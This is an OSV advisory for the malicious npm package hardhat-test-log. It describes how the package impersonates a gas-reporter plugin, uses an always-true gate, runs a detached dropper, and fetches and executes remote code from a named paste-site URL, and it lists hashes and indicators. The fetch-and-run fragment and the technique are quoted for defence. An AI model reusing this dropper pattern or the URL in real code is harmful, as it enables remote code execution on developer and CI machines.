MAL-2026-6369

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-test-log/MAL-2026-6369.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6369
Published
2026-06-24T04:13:05Z
Modified
2026-06-29T07:16:44.484585522Z
Summary
Malicious code in hardhat-test-log (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed)

The package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: the README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects).

The advertised Mocha reporter entrypoint is a decoy. index.js exports log as the reporter, but the function contains var opt = 1; if (!opt) { ...legitimate reporter code... } else { gestest(); }. Since opt is always truthy, the dead-code gate guarantees the else branch always runs, calling utils.connectNet.

utils.connectNet (lib/utils.js) spawns node lib/syncResolve.js as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output.

lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key': ... } }), extracts the Cookie field from the response, and executes it in-process via new Function.constructor('require', result)(require), giving attacker-controlled code full Node require access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will.

Installing or using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.0"
            ],
            "sha256": "c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6",
            "source": "amazon-inspector",
            "modified_time": "2026-06-24T04:13:05Z",
            "import_time": "2026-06-24T04:54:34.025624165Z",
            "id": "IN-MAL-2026-007420"
        },
        {
            "versions": [
                "1.1.2"
            ],
            "sha256": "741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "modified_time": "2026-06-29T06:04:48Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007763",
            "import_time": "2026-06-29T07:09:10.865962004Z"
        }
    ]
}

Affected packages

Package

npm / hardhat-test-log

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)

Affected versions

1.*
1.1.0
1.1.2

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "hardhat-test-log-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-YLkLCn9I3nIVSFFgBoXj4LMJl9WCwc5K0uTiRvo4Y2z03fYwWmIGF7hyC9ypZvdeE0yFzFiGs8frLzqSi+jLMA==",
                "sha1": "b4ce708860e4f50e9de722399683656770515e36"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "44002399a2427b6245b7aba983e270b3dade9e1c7e0d669807dfaaa78cb3ebbc",
            "path": "lib/syncResolve.js",
            "tlsh": "14017b9e3469e02c0eb012e9af175032f6126f27310ba1e9769d9b521f7ac695502eec"
        },
        {
            "sha256": "36c4c472f4d5f3409e527ffb69b413a6ef81c853ed6a4b82bc1ac32d19dbf371",
            "path": "lib/utils.js",
            "tlsh": "250231961cf760d3112a35e8aa1b6011e568b65b3208daf5bead53443f0633cd0e7ae9"
        },
        {
            "sha256": "db6f048ab50bdad5c12883185a63f731a1ff1f9d98055ea63e34e9d28137415f",
            "path": "index.js",
            "tlsh": "b3f1fe322eb7153745e3faac9bcba061d12696372201cfad7a8c93104f5447894efbe4"
        },
        {
            "sha256": "0ae78997fb4e33b7f2a18353ddeda8f65e274e766310e6dfe803cd91fb8bf26b",
            "path": "README.md",
            "tlsh": "b362e8f33e0a4a620f7be7c4550db5a4ff2a915cd6976a95b4ae834c23062b241ef190"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-test-log/MAL-2026-6369.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]